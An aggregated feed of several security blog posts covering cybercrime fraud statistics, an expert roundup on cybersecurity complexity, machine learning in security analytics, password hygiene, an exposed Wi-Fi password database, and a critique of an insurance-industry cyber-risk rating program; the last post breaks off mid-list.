So what’s driving this explosive growth in cybercrime? Interestingly enough, it’s actually a new form of a very old crime: Fraud. And by old, I mean really old! They say the earliest recorded form of fraud is the story of Hegestratos in 300 BC! Hegestratos took out a large loan for cargo secured against the value of his ship. When the ship arrived, and the cargo was sold, the lender would be repaid with interest. If the loan was not repaid, the lender had security in the form of the ship. However, if the ship sank, the lender lost both the loan and the security. Needless to say, Hegestratos figured it was easier to sink the ship, save the cargo and sell it and pocket the loan for good measure! What’s remarkable is how, since those days, fraud has evolved as time, technology, and most importantly, the law has advanced. After all, why even bother going to all the trouble of having a ship if you can just pretend to have one? This was made an offense in the UK by as early as 1541 (obtaining property by false or counterfeit token). Once again, fraud evolved so that by 1757 the law would need to be updated to the broader concept of false representation. In the US, with its larger geography, the symbiotic evolution of fraud, technology, and the law are even more clear where counterfeiting laws of 1797 evolved into false claims in 1863, mirroring the evolution of the law in the UK before then having to add mail fraud in 1872 and then wire fraud in 1952. At each stage you can see how criminals are the first to adapt and exploit the opportunities new technology provides for fraud before the defenders can catch up.

Today, little has changed as we continue to see the same scenarios playing out. According to the German Federal Police Division responsible for Crime, the Bundeskriminalamt (BKA), 99.4% of all recorded cybercrime loses come from fraud. The emphasis here is on recorded losses as the BKA makes some great points about the difficulties in truly quantifying cybercrime losses, especially intangible losses such as reputational or brand impact. Therefore, if we cross reference these numbers with the annual Internet Crime Report from the FBI Internet Crime Complaint Center (IC3) and some quick addition reveals that all forms of fraud accounted for approximately 85% of the overall number, validating the BKA’s approach. In fact, they specifically call out the losses associated with two specific forms of fraud known as Business Email Compromise (BEC) and Email Account Compromise (EAC). These are two variations on a fraud in which the criminals use social engineering, deception, or other intrusion techniques to conduct unauthorized transfers of funds.

The classic example of this is when the person responsible for the finance or payment of suppliers receives an email purportedly from the Chief Executive Officer (CEO) demanding the urgent payment of a supplier via wire transfer. Of course, the email isn’t from the CEO and the account details are nothing more than an account being held by another unsuspecting person who will transfer it on again. By the time the fraud has been identified, the money has moved several times through various accounts and potentially countries and will rarely be recovered. Emphasizing the earlier point regarding the professional nature of this type of crime, the FBI said the perpetrators of this are “transnational criminal organizations that employ lawyers, linguists, hackers, and social engineers” who “may spend weeks or months studying the organization’s vendors, billing systems, and the CEO’s style of e-mail communication and even his or her travel schedule.” The gains for the criminal are staggering, in its 2016, 2017 and 2018 reports, the FBI IC3 identified it as a hot topic and estimated the losses in 2018 were nearly $1.4 billion.

How does this compare with losses from other forms of cybercrime? Well, in 2018, the FBI statistic for losses due to another popular from of cybercrime, the classic corporate data breach, was $117.7 million or 8% of the loss due to BEC/EAC. Looking at the state of California within the FBI statistics, we see that BEC/EAC is the single biggest cause of losses, accounting for 33% of the overall losses due to any form of cybercrime. So, has this risk peaked? Well, examining a survey from credit agency, Experian, you can see that they identified that 72% of businesses have a growing concern about fraud in 2017 and 63% of them have experienced the same or higher losses due to fraud pointing to a real and growing risk. It’s worth bearing in mind that despite the FBI’s estimated total losses from BEC/EAC now exceeding $5 billion, the losses increased 78% between 2016 and 2017 and again by 92% between 2017 and 2018. Bad as it is, things may continue to get a lot worse.

So, what is to be done? In the next blog post, I’ll be talking about some of the strategies, products, and technologies that can help address and mitigate the issues I discussed in this blog. Of course, I welcome your thoughts, comments and feedback so please do take the time to let me know your thoughts!

The post Cybercrime and Fraud Part 1: Modern Tales of Piracy and Plunder appeared first on Cisco Blog.

Cyber Security + Compliance Controls: What Does It All Mean, Rick?

I’m sure you have all seen the Rickie Fowler commercial where the interviewer rants about all of the confusing financial terms involved with getting a mortgage. If not, you can find it below: Confusion in Cyber Security Throughout my career, I have worked with hundreds of organizations. Regardless of the vertical or size of the […]… Read More

The post Cyber Security + Compliance Controls: What Does It All Mean, Rick? appeared first on The State of Security.

Expert Roundup: Why Can’t Cybersecurity Be Simpler?

Time and time again, people ask:

Why can’t cybersecurity be simpler?

This question is not asked just by regular users confused by the “techno-babble” or enraged by information leaks.

It’s also increasingly asked by business owners, analysts, journalists and even the people involved in securing information, whether sysadmins for small companies or even high-level executives in multinational organizations.

This is why we thought to go straight to the source to find the best responses. Last time, we asked specialists to say whether they think that Internet security is a losing battle or not and their responses were memorable. Today, we asked highly accomplished cybersecurity experts from various infosec fields another tricky question and they were gracious enough to provide their insights.

If you’re a regular user angry at your data being exposed to various leaks and cyber attacks, you will get a behind-the-scenes look at the reasons why these incidents happen. If you’re someone involved in handling customers’ data, these perspectives will prove to be just as illuminating.

We wanted to provide you valuable, often hard to find perspectives. We managed to make a great start to answer a simple-looking, but an actually difficult and ramified question.

Why can’t cybersecurity be simpler?

Use the links below to quickly navigate the experts’ replies.

  • Brent White (BITKILL3R)– Senior Security Consultant at NTT Security and the founder of the Nashville DEF CON group
  • Ian Thornton-Trump – Cyber Vulnerability & Threat Hunting Lead at Ladbrokes Coral Group and CTO of Octopi Managed Services Inc
  • Isaac Kohen – Founder and CEO of Teramind, an employee monitoring and insider threat prevention platform
  • Joe Ward – Senior Security Analyst at Bishop Fox
  • John Mason – Cyber security and privacy enthusiast, analyst for TheBestVPN
  • Peter Buttler – Cyber security journalist, consultant at PrivacyEnd
  • Albert Ahdoot – Business Development Director at Colocation America
  • Harsh Agrawal – Founder and CEO of ShoutMeLoud.com

 

Brent White

Brent is a Senior Security Consultant at NTT Security and the founder of the Nashville DEF CON group. He can be found at We Hack People, a website dedicated to red team and social engineering assessments.

 

brent white we hack peopleSecurity isn’t a convenience because it requires being careful and demands that users be diligent to take extra steps to follow rules.

I focus on social engineering and physical security and see this come in to play on a regular basis when a company hires me to break into their buildings.

For example, tailgating (piggybacking) is one of the most common ways that I gain unauthorized access to a business.

This could be mitigated if employees followed their security awareness training and made sure that everyone who entered was scanning their badge, and that the badge being scanned was valid.

However, this takes time and requires people who are already focused on their own paths and agendas to slow down and be more aware of their surroundings.

Asking them to change their thought process and to “validate” each person coming in the door isn’t something that’s going to happen overnight.

You also have the human kindness factor that is innate in most of us, where we naturally want to help out someone in need.

This is easily exploited by a social engineer in many ways, whether it’s pretending to need help opening the door because their arms are full, or the social engineer can simply tailgate in, be in an “argument” on the phone (making the situation uncomfortable on purpose).

People will want to avoid a potential confrontation with someone who already appears to be upset about something.

Once an attacker has physical access to data, it’s pretty much “game over”.


Full #redteam assessments are a good way to consistently check the level of awareness and response within an organization.
Click To Tweet


Companies need to go beyond the required annual “security awareness” training PowerPoints if they want to get serious about addressing these issues.

Regular drills such as internal phishing campaigns, testing unauthorized entry, and even full red team assessments are a good way to consistently check the level of awareness and response within an organization.

Employees should be incentivized to find and report something, and have a clear path of how and who to report incidents to in a way that is easy and convenient for them. 

It’s very difficult to incorporate a security mindset 100% into the culture of a company. But, when it’s done correctly, it can be a very effective countermeasure against potential threats.

Ian Thornton-Trump

Ian is the Cyber Vulnerability & Threat Hunting Lead at Ladbrokes Coral Group and CTO of Octopi Managed Services Inc.He can be reached on Twitter here.

 

dr ian thornton trumpSecurity can be simple, but it won’t ever be because business is not simple. And humans are not simple. And security today is in some malevolent Venn diagram right in the damn center of what can only be described for 80% (ish) of the GNP of a country as the small-medium business/enterprise (SMB/SME in the EU UK) security nightmare.

It’s not easy being profitable and everyone from the governments to the regulators (hackers in suits) to the cyber criminals (hackers in hoodies) is out to attack the hard work of organizations which strive to make an honest living.

I’m a cybersecurity Captain Willard.

“I was going to the worst cyber security situation in the world and I didn’t even know it yet. Weeks away and hundreds of dollars/pounds/euros spent on a security project that snaked through the compliance regulations like a main circuit cable plugged straight into the businesses cybersecurity posture. It was no accident that I got to be the caretaker of a business’s cybersecurity any more than being back in some SANS certification course was an accident. There is no way to tell the businesses’ cybersecurity story without telling my own. And if that business story is really a confession, then this may be my own as well.”

That’s where we are today. Most businesses are scared of an existential threat from criminal hackers (or regulatory authorities) and are turning to security vendors and consultants to solve their security problem.

The reality is: the problem is cultural and societal.


We sacrifice #security for convenience and we consistently place profit in front of pragmatism.
Click To Tweet


We reward efficiency over good decision making, we sacrifice security for convenience and we consistently place profit in front of pragmatism.

Cybersecurity is complicated because life is complicated and there is no perfection. We can’t be a hundred percent secure – so the rhetoric and fear monger of vendors and security professionals has given in to a feeling of helplessness and disparity among the 80%.

If this short essay strikes you as incoherent, it only matches the vast majority of SMB/SME firms approaches to cybersecurity: cybersecurity perfection is not attainable.

Attempting to apply the binary model of security and compliance to the “grayness” of business, life and society only ends in disappointment.

If this is dystopian view makes you angry or causes you discomfort – good, do something about it – change the security culture, change the business world.

It may never be simple, but you may be able to keep the doors open.

Isaac Kohen

Isaac is the founder and CEO of Teramind, an employee monitoring, and insider threat prevention platform that detects, records, and prevents malicious user behavior. He can be reached at ikohen@teramind.co.

 

isaac kohen teramind founderAs much as we wish life to be straightforward and simple, reality seems to tell us a different story.

The reality around security is it feels complicated, dynamic and perpetually a ‘catch up’ game in keeping company data secure.

With new technologies advances like the internet of things (IoT), the security landscape becomes more intertangled, and companies find themselves with new vulnerabilities and ‘patching’ new security holes in their IT infrastructure.

With many moving parts, it’s not a surprise that the traditional approach to a security plan doesn’t seem possible.

In my opinion, the best way to prepare for the future is to move from a protection to a prevention security mindset.

This progressive strategy looks at data security in ‘real time’ meaning security isn’t viewed as an afterthought, rather it’s using data, monitoring, and analytics to anticipate security breaches and adapt quickly to changing security landscapes.


#Teramind: The best way to prepare for the future is to move from a protection to a prevention security mindset.
Click To Tweet


Joe Ward

Joe is a Senior Security Analyst at Bishop Fox. His thoughts on infosec can be found here.

bishop foxFirst, there is an accelerating rate of change and complexity in systems.

Driven by market forces to deliver more features and derive more value, new technologies are invented every day, and old technologies are being leveraged in new and interesting ways.

Second, there has been historically strong pressure to maintain backward compatibility to the point that the foundation of newer technologies is built on legacy systems riddled with security defects that can never be fixed.

Ultimately I think the increasing pace of “what CAN we do” has overshadowed the fundamental question of “what SHOULD we do”, leaving the question of “what can we do SAFELY” unasked.


The foundation of newer technologies is built on legacy systems riddled with security defects that can never be fixed. #securitychallenges
Click To Tweet


John Mason

John is a cybersecurity and privacy enthusiast, working as an analyst for TheBestVPN. He can be reached on Twitter.

 

john mason thebestvpn$3.8 million.

That’s the average cost of one cyber hacker who penetrates your security and wrecks havoc on your business.

Online security isn’t just a matter of protecting your website’s IP address. You are protecting your customers from identity theft and your business from a lawsuit.

Of course, those are just two examples of potential damage. Hackers intent on disrupting your business for their own gain won’t stop at mere annoyance. They’ll do everything they can to harm your website and take what they want.


That’s the average cost of one cyber hacker who penetrates your security and wrecks havoc on your business? $3.8 million. #cybersecurity
Click To Tweet


Sadly, they’re pretty good at their work. Extremely good.

There’s no shortage of high-ranking companies who’ve fallen victim to a website breach, like Verizon Wireless or Virgin America. All of those hacks damage not only the business but even worse, they damage customer’s privacy even more.

Which further means that you, as a business, don’t just lose the public’s trust, you lose previously loyal customers.

From restore points and network monitoring to firewalls and malware scanning, each integration protects your business and, more importantly, your customers.

Prioritizing simplicity over thorough security is a mission-critical mistake. One that CEOs from bigger companies who’ve fallen victim will tell you not to make.

 

Peter Buttler

Peter Buttler is a cybersecurity journalist and a tech reporter. He is the security consultant at PrivacyEnd. You can follow him on Twitter.

 

peter buttlrSecurity isn’t an accommodation since it requires being cautious and demands clients to be persistent about finding a way to look after weaknesses.
Cyber-security is complex in light of the fact that our life is never 100% perfect.

We can’t be a hundred percent secure – so the talk of security experts has yielded to a sentiment weakness among the 70%.
With new innovations like IoT, the security scene turns out to be more complicated, and organizations end up with new vulnerabilities and ‘fixing’ new security flaws in their IT foundation.

Driven by advertising powers to convey more highlights and determine more esteem, new technologies are designed each day, and old technologies are being utilized in new and fascinating ways.

From re-establishing indicates and organizing monitor firewalls and malware filtering, every coordination in cybersecurity protects your business and most importantly your clients.

 

Albert Ahdoot

Albert is the Business Development Director at Colocation America. He can be reached on Twitter.

colocation-america-square
Security isn’t an accommodation since it requires being cautious and demands clients to be persistent about finding a way to look after weaknesses.
Let’s state the obvious: the Internet is always changing. Everyday new technology is created while our current technology systems continue to evolve. The cyberworld, in itself, is a complex system; technology companies are creating new systems and features faster than ever before.

However, this “need for speed” approach is not always benefiting the client and/or business at hand. With the ever-changing landscape of the Internet, cyber attacks are becoming more frequent. Hackers are exploiting the cyber-security shortcuts taken by businesses needing to be the “first to adapt.”

By the time the business implements cybersecurity measures, the cyber attack has already happened, and the hackers have moved on. Cybersecurity is like a massive game of Cat & Mouse meets Whac-A-Mole—once you fix one issue, another pops up. No matter how secure your system is one minute, the next, it can be under attack.

To top it all off, there is a shortage of cybersecurity professionals. As we look to the future of the Internet, we must consider the players involved. While we encourage innovation in the fields of software development, we need to do the same in the realm of cybersecurity. After all, we, as individuals, are relying on technology more than ever to keep us safe – but who is going to keep us safe from our technology?

Thankfully, some businesses understand cybersecurity and its complexity. Let’s all hope businesses, small and large, are utilizing them (for all our sakes).

Harsh Agrawal

Harsh is the founder and CEO of an award-winning blog known as “ShoutMeLoud”. He`s an engineer by education and a blogger by profession. You can reach him on Twitter.

 

Some guys think that cybersecurity is as simple as affiliate marketing or blogging. After all, it’s just about providing safe methods for internet users to complete their online activities, right?

Well, not quite.

With more and more hackers trying to get hold of sensitive information and finding new, advanced ways to do it, you can never be at ease. It is crucial that people understand no one is safe, especially if they handle their personal information carelessly.

But even if users and companies do take care of the data, unfortunately, a breach occasionally happens.

I mean, do you really think that Equifax, Target, and so many other companies wouldn’t do anything to prevent the scandals that have happened in the past years?

It has to be complicated because the world wide web is such a complicated realm, nothing like people have ever known before.

So, it all boils down to being constantly on guard and finding new and innovative ways to be one step ahead of hackers and frauds.

Conclusion

We would like to thank all the people who participated in this expert roundup for taking the time to answer this question and provide the community with some necessary insights into the fascinating world of cybersecurity.

Do you have another perspective on why security is too complicated? Are you from a different background or feel the need to add to the topic?
We plan to keep this column updated, so if you want to contribute, drop us a line and let’s talk!


#cybersecurity is too complicated? See what the specialists think or answer yourself!
Click To Tweet


The post Expert Roundup: Why Can’t Cybersecurity Be Simpler? appeared first on Heimdal Security Blog.

The State of Machine Learning in 2019

Here we are, almost four whole months into 2019 and machine learning and artificial intelligence are still hot topics in the security world. Or at least that was the impression I had. Our 2019 CISO Benchmark Report however, found that between 2018 and 2019, CISO interest in machine learning dropped from 77% to 67%. Similarly, interest in artificial intelligence also dropped from 74% to 66%.

Now there are a number of reasons why these values could have dropped over a year. Maybe there’s a greater lack of certainty or confidence when it comes to implanting ML. Or perhaps widespread adoption and integration into more organizations has made it less of a standout issue for CISOs. Or maybe the market for ML has finally matured to the point where we can start talking about the outcomes from ML and AI and not the tools themselves.

No matter where you stand on ML and AI, there’s still plenty to talk about when it comes to how we as an industry are currently making use of them. With that in mind, I’d like to share some thoughts on ways we need to view machine learning and artificial intelligence as well as how we need to shift the conversation around them.

More effective = less obvious

I’m still amazed by how machine learning is still a hot topic. That’s not to say it does not deserve to be an area of interest though. I am saying however, that what we should be talking about are the outcomes and capabilities it delivers. Some of you may remember when XML was such a big deal, and everyone could not stop talking about it. Fast forward to today and no one advertises that they use XML since that would just be obvious and users care more about the functionality it enables. Machine Learning will follow along the same path. In time, it will become an essential aspect of the way we approach security and become simply another background process. Once that happens, we can focus on talking about the analytical outcomes it enables.

An ensemble cast featuring machine learning

Anyone who has built an effective security analytics pipeline knows that job one is to ensure that it is resilient to active evasion. Threat actors know as much or more than you do about the detection methods within the environments they wish to penetrate and persist. The job of security analytics is to find the most stealthy and evasive threat actor activity in the network and to do this, you cannot just rely on a single technique. In order for that detection to happen, you need a diverse set of techniques all of which complement one another. While a threat actor will be able to evade one or two of them simultaneously, they don’t stand a chance against hundreds of them! Detection in diversity!

To explain this, I would like to use the analogy of a modern bank vault. Vaults employ a diverse set of detection techniques like motion, thermal, laser arrays, and on some physical dimension, an alarm will be tripped, and the appropriate response will ensue. We do the same in the digital world where machine learning helps us model timing or volumetric aspects of the behavior that are statistically normal and we can signal on outliers. This can be done all the way down at the protocol level where models are deterministic or all the way up to the application or users’ behavior which can sometimes be less deterministic. We have had years to refine these analytical techniques and have published well over 50 papers on the topic in the past 12 years.

The precision and scale of ML

So why then can’t we just keep using lists of bad things and lists of good things? Why do we need machine learning in security analytics and what unique value does it bring us? The first thing I want to say here is that we are not religious about machine learning or AI. To us, it is just another tool in the larger analytics pipeline. In fact, the most helpful analytics comes from using a bit of everything.

If you hand me a list and say, “If you ever see these patterns, let me know about it immediately!” I’m good with that. I can do that all day long and at very high speeds. But what if we are looking for something that cannot be known prior to the list making act? What if what we are looking for cannot be seen but only inferred? The shadows of the objects but never the objects if you will. What if we are not really sure what something is or the role it plays in the larger system (i.e., categorization and classification)? All these questions is where machine learning has contributed a great deal to security analytics. Let’s point to a few examples.

The essence of Encrypted Traffic Analytics

Encryption has made what was observable in the network impossible to observe. You can argue with me on this, but mathematics is not on your side, so let’s just accept the fact that deep packet inspection is a thing of the past. We need a new strategy and that strategy is the power of inference. Encrypted Traffic Analytics is an invention at Cisco whereby we leverage the fact that all encrypted sessions begin unencrypted and that the routers and switches can send us an “Observable Derivative.” This metadata coming from the network is a mathematical shadow of the payloads we cannot inspect directly because it is encrypted. Machine learning helps us train on these observable derivatives so that if its shape and size overtime is the same as some malicious behavior, we can bring this to your attention all without having to deal with decryption.

Why is this printer browsing Netflix?

Sometimes we are lucky enough to know the identity and role of a user, application, or device as it interacts with systems across the network. The reality is, most days we are far from 100% on this, so machine learning can help us cluster network activity to make an assertion like, “based on the behavior and interactions of this thing, we can call it a printer!”. When you are dealing with thousands upon thousands of computers interacting with one another across your digital business, even if you had a list at some point in time – it is likely not up to date. The value to this labeling is not just so that you have objects with the most accurate labels, but so you can infer suspicious behavior based on its trusted role. For example, if a network device is labeled a printer, it is expected to act like a printer – future behavior can be expected from this device. If one day it starts to browse Netflix or checks out some code from a repository, our software Stealthwatch generates an alert to your attention. With machine learning, you can infer from behavior what something is or if you already know what something is, you can predict its “normal” behavior and flag any behavior “not normal.”

Pattern matching versus behavioral analytics

Lists are great! Hand me a high-fidelity list and I will hand you back high-fidelity alerts generated from that list. Hand me a noisy or low fidelity list and I will hand you back noise. The definition of machine learning by Arthur Samuels in 1959 is “Field of study that gives computers the ability to learn without being explicitly programmed.” In security analytics, we can use it for just this and have analytical processes that implicitly program a list for you given the activity it observes (the telemetry it is presented). Machine learning helps us implicitly put together a list that could not have been known a priori. In security, we complement what we know with what we can infer through negation. A simple example would be “if these are my sanctioned DNS servers and activities, then what is this other thing here?!” Logically, instead of saying something is A (or a member of set A), we are saying not-A but that only is practical if we have already closed off the world to {A, B} – not-A is B if the set is closed. If, however we did not close off the world to a fixed set of members, not-A could be anything in the universe which is not helpful.

Useful info for your day-to-day tasks

I had gone my entire career measuring humans as if they were machines, and not I am measuring humans as humans. We cannot forget that no matter how fancy we get with the data science, if a human in the end will need to understand and possibly act on this information, they ultimately need to understand it. I had gone my entire career thinking that the data science could explain the results and while this is academically accurate, it is not helpful to the person who needs to understand the analytical outcome. The sense-making of the data is square in the domain of human understanding and this is why the only question we want to ask is “Was this alert helpful?” Yes or no. And that’s exactly what we do with Stealthwatch. At the end of the day, we want to make sure that the person behind the console understands why an alert was triggered and if that helped them. If the “yeses” we’ve received scoring in the mid 90%’s quarter after quarter is any indication, then we’ve been able to help a lot of users make sense of the alerts they’re receiving and use their time more efficiently.

Conclusion

We owe a big round of applause to artificial intelligence for birthing the child we know, and love named machine learning and all that it has contributed to security analytics over the past year. We remain pragmatic in its application as we know that, just because it is the new kid on the block, we cannot turn our backs on simple or complex lists of rules, simple statistical analysis, and any other method that has got us to where we are today.

Lucky for us, machine learning has already shown signs of playing well with its peers as we continue to find ways to improve existing security processes through pairing them with ML. It can’t solve every single problem on its own, but when it works together with the people and processes that have come before it, we get that much closer to a more secure future. And if Machine Learning is the child of AI, who then are its brothers and sisters that we have yet to explore in Security Analytics? We have some big ideas and some already in prototype state, but remember, in the end, we will ask you if it is helpful or not helpful, not all the data science mumbo jumbo!

As always, we welcome your comments below. Readers who enjoyed this blog would also benefit from viewing our library of recent Cybersecurity Reports or checking out our new Threat of the Month blog series.

The post The State of Machine Learning in 2019 appeared first on Cisco Blog.

Protect Your Digital Life: Why Strong Passwords Matter

Over the years, our lives have become more and more digital. Think about it: 20 years ago, no one was using banking apps and social media had just barely begun coming to fruition. Now, many of us are reliant on mobile banking to pay our bills and we check our favorite social media platforms multiple times a day. Our lives exist almost entirely online with our sensitive personal data shielded by password protection — from our financials to our official documentation, personal photos and more. With so much of our personal data relying on the strength of our online passwords, it’s vital that users stay up-to-date on the latest password security practices. As we take the time to recognize World Password Day, it’s important to think about why passwords matter and how you’re safeguarding your personal information online.

 

 

Think about all of the online data you have that is password protected: your email, your social media accounts, your online banking profile, your movie and TV streaming service, the list goes on and on. If you aren’t following best practices for password security and just one of your passwords is exposed or breached, this could potentially lead to cybersecurity turmoil. For example, an Android app that helped users find and connect to free Wi-Fi hotspots recently left its database of more than 2 million network passwords exposed. While the app claimed to only share public hotspots, many were found to be home wireless networks thanks to the precise GPS location data that was also stored in the database. Now imagine that one of the victims of this password exposure utilized the same credentials for their online banking profile. If their password ended up in the wrong hands, a cybercriminal could potentially access the user’s financial data, leading to fraudulent charges or even identity theft. As you can see, creating a strong and unique password could mean the difference between keeping your online data safe and being at risk of a cyberattack.

Many people just go through the motions when creating passwords instead of taking the time to consider what exactly their credentials are protecting. World Password Day is the perfect opportunity to be diligent about revamping passwords. Check out the following tips to take your password security to the next level:

  • See if your passwords have been exposed. Go to a site such as HaveiBeenPwned to see if your password(s) have been compromised in a breach. Change them if you find that your credentials may have been jeopardized.
  • Layer up your passwords. Passwords should always contain a variety of capital and lowercase letters, numbers, and symbols. Today, many systems enforce password requirements during the account set-up process to ensure password strength.
  • Choose unique passwords across all of your accounts. Many consumers utilize the same password, or variations of it, across all of their accounts. This means if a hacker discovers just one password, all personal data is suddenly at risk. Therefore, it is crucial to diversify your passcodes to ensure hackers cannot obtain access to all of your accounts at once, should one password be compromised.
  • Use a password manager. Since it can be difficult to remember multiple complex passwords, use a password manager to keep track. With password managers, you’ll only need to remember one master password, in order to access the rest. Many password managers can also generate strong passwords to utilize when creating new logins.
  • Enable two or multi-factor authentication. Two or multi-factor authentication provides an extra layer of security, as it requires multiple forms of verification. This reduces the risk of successful impersonation by hackers.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Protect Your Digital Life: Why Strong Passwords Matter appeared first on McAfee Blogs.

Inside the Government Cybersecurity Landscape: Federal vs. State Level Challenges

Few would dispute the idea that an effective cybersecurity profile requires candid assessments of potential vulnerabilities. Here’s a closer look at the challenges facing the federal cybersecurity mission and the efforts of state-level agencies. Federal Though the federal government demonstrates an ongoing commitment to ramping up its cybersecurity mission with annual spending in the tens […]… Read More

The post Inside the Government Cybersecurity Landscape: Federal vs. State Level Challenges appeared first on The State of Security.

Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed

Logging onto a free Wi-Fi network can be tempting, especially when you’re out running errands or waiting to catch a flight at the airport. But this could have serious cybersecurity consequences. One popular Android app, which allowed anyone to search for nearby Wi-Fi networks, was recently left exposed, leaving a database containing over 2 million network passwords unprotected.

How exactly were these passwords exposed? The app, which had been downloaded by millions of users, allowed anyone to search for Wi-Fi networks in their area. The app also lets users upload their Wi-Fi network passwords from their devices to its database for others to use. When the database was left exposed and unprotected, anyone could access and download its contents. Each record in the database contained the Wi-Fi network name, its precise geolocation, its basic service set identifier, and the network password in plaintext. Because the app didn’t require users to obtain permission from the network owner, it would be quite easy for a cybercriminal to modify router settings and point unsuspecting users to malicious websites. What’s more, a threat actor could also read unencrypted traffic that goes across a wireless network, allowing them to steal passwords and private data.

Thankfully, the web host was able to take down the database containing the Wi-Fi passwords within a day of being notified. But it’s important for users to be aware of the cybersecurity implications that free or public Wi-Fi presents. Check out the following tips to help protect your data:

  • Change your Wi-Fi password. If you think your password may have been affected by this exposure, err on the side of caution and reset it. Be sure to make your new password complex and unique.
  • Keep your network password private. Wi-Fi networks could be susceptible to a number of threats if their passwords are left in the wrong hands. Only share your passwords with family, friends, and those you trust, and never upload your password to a public database for strangers to use.
  • Safeguard your online privacy. Use a security solution like McAfee Safe Connect to encrypt your online activity, protect your privacy by hiding your IP address, and better defend against cybercriminals.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Wi-Fi Woes: Android Hotspot App Leaves 2 Million Passwords Exposed appeared first on McAfee Blogs.

What This Report on Cyber Risk Gets Wrong

The Marsh brokerage unit of Marsh and McLennan recently announced a new evaluation process called Cyber Catalyst designed to determine the usefulness of enterprise cyber risk tools.

The goal of the new offering is to identify and implement industry-wide standards to help cyber insurance policyholders make more informed decisions about cyber-related products and services; basically, what works and what doesn’t. Other major insurers participating in Cyber Catalyst include Allianz, AXA XL, AXIS, Beazley, CFC, and Sompo International.

While this collaboration between insurance companies is unusual, it’s not entirely surprising. Cyber insurance is a $4 billion market globally. While it’s difficult to accurately gauge how many hacking attempts were successfully foiled by the products targeted here, data breaches and cyber attacks on businesses continue to increase in frequency and severity. The 2019 World Economic Forum’s Global Risks Report ranks “massive data fraud and theft” as the fourth greatest global risk, followed by “cyber-attacks” in the five slot.

Meanwhile, cybersecurity products and vendors have been, to be charitable, a mixed bag.

Good in Theory

From this standpoint, Cyber Catalyst seems like not just a good idea, but an obvious one. A standardized metric to determine which cybersecurity solutions are no better than a fig leaf and which ones provide real armor to defend against cyberattacks is sorely lacking in the cybersecurity space. By Marsh’s own estimates, there are more than three thousand cybersecurity vendors amounting to a $114 billion marketplace. Many of them don’t inspire confidence on the part of businesses.

Insurers have a vested interest in determining the effectiveness of cybersecurity products, weeding out buggy software and promoting effective solutions that can help address risk aggregation issues. Businesses and their data are in turn better protected, and at least in theory, they would pay less for coverage. Everyone wins.

Insurance companies did something similar in the 1950s with the creation of the Insurance Institute for Highway Safety. In the face of rising traffic collisions and fatalities, the insurance industry collaborated to establish a set of tests and ratings for vehicles, and the result has been a gold standard for automotive safety for decades. Using a similar strategy for cybersecurity would at least in theory help mitigate the ever-increasing costs and risks to companies and their data.

Or Maybe Not

Where the analogy to the Insurance Institute for Highway Safety breaks down is here: The threats to car drivers and passengers have ultimately stayed the same since its inception. Everything we’ve learned over the years about making cars has progressively led to safer vehicles. Information technology is vastly different in that iterative improvements in one specific area doesn’t necessarily make an organization as a whole safer or better protected against cyber threats–in fact sometimes it can have the opposite effect when a new feature added turns out to be a bug.

Cyber defenses are meaningless in the presence of an unintended, yet gaping, hole in an organization’s defenses. Then there is the march of sound innovation. Products that provided first-in-class protection for a business’s network a few years ago may no longer be so great where cloud computing and virtual servers, or BYOD are concerned. The attackable surface of every business continues to increase with each newly introduced technology, and it seems overly optimistic to assume the standard evaluation process (currently twice a year) would be able to keep pace with new threats.

There’s also the risk of putting too many eggs into one basket. While the diffuse nature of the cybersecurity market causes headaches for everyone involved, establishing a recommended solution or set of solutions effectively makes them an ideal target for hackers. While it’s important to keep consumers and businesses informed of potential risk to their information, cybersecurity issues require a certain amount of secrecy until they have been properly addressed. Compromising, or even identifying and reporting on a vulnerability before it’s been patched in an industry standard security product, process or vendor practice could cause a potentially catastrophic chain reaction for cyber insurers and their clients.

Culture Eats Strategy for Breakfast

Where the Cyber Catalyst program seems to potentially miss the mark is by overlooking the weakest link in any company’s security (i.e., its users). An advanced cybersecurity system or set of tools capable of blocking the most insidious and sophisticated attack can readily be circumvented by a spear phishing campaign, a compromised smartphone, or a disgruntled employee. Social engineering cannot be systematically addressed. Combatting the lures of compromise requires organizations to foster and maintain a culture of privacy and security.

The risk of employee over-reliance on tools and systems at the expense of training, awareness, and a company culture where cybersecurity is front and center must not be underestimated. While it is easier to opt for the quick and easy approach of purchasing a recommended solution, companies still need a comprehensive and evolving playbook to meet the ever-changing tactics of persistent, sophisticated and creative hackers.

While industry-wide cooperation may be a good thing, it’s vital for companies and insurers alike to recognize that any security program or service is fallible. Without an equal investment in functional cybersecurity, which places as much store in training employees and keeping aware of new threats, the rise in breaches and compromises will continue.

This article originally appeared on Inc.com.

The post What This Report on Cyber Risk Gets Wrong appeared first on Adam Levin.

Digital Parenting: ‘Eat Your Veggies, Brush Your Teeth, Strengthen Your Passwords’

strong password

strong passwordAs adults, we know the importance of strong passwords, and we’ve likely preached the message to our kids. But let’s rewind for a minute. Do our kids understand why strong passwords are important and why it needs to become a habit much like personal health and hygiene?

If we want the habit to stick, the reason why can’t be simply because we told them so. We’ve got to make it personal and logical.

Think about the habits you’ve already successfully instilled and the reasoning you’ve attached to them.

Brush your teeth to prevent disease and so they don’t fall out.
Eat a balanced diet so you have fuel for the day and to protect yourself from illness and disease.
Get enough sleep to restore your body and keep your mind sharp for learning.
Bathe and groom to wash away germs (and to keep people from falling over when you walk by). 

The same reasoning applies to online hygiene: We change our passwords (about every three months) to stay as safe as possible online and protect what matters. When talking to kids, the things that matter include our home address, our school name, our personal information (such as a parent’s credit card information, our social security number, or other account access).

Kids Targeted

We falsely believe that an adult’s information is more valuable than a child’s. On the contrary, given a choice, 10 out of 10 hackers would mine a child’s information over an adult’s because it’s unblemished. Determined identity thieves will use a child’s Social Security number to apply for government benefits, open bank, and credit card accounts, apply for a loan or utility service or rent an apartment. Also, once a child’s information is hacked, a thief can usually get to a parent’s information.

How to Stay Safe

It’s a tall task to prevent some of the massive data breaches in the news that target kids’ information. However, what is in our control, the ability to practice and teach healthy password habits in our home.

Tips for Families

strong passwordShake it up. According to McAfee Chief Consumer Security Evangelist Gary Davis, to bulletproof your passwords, make sure they are at least 12 characters long and include numbers, symbols, and upper and lowercase letters. Consider substituting numbers and symbols for letters, such as zero for “O” or @ for “A”.

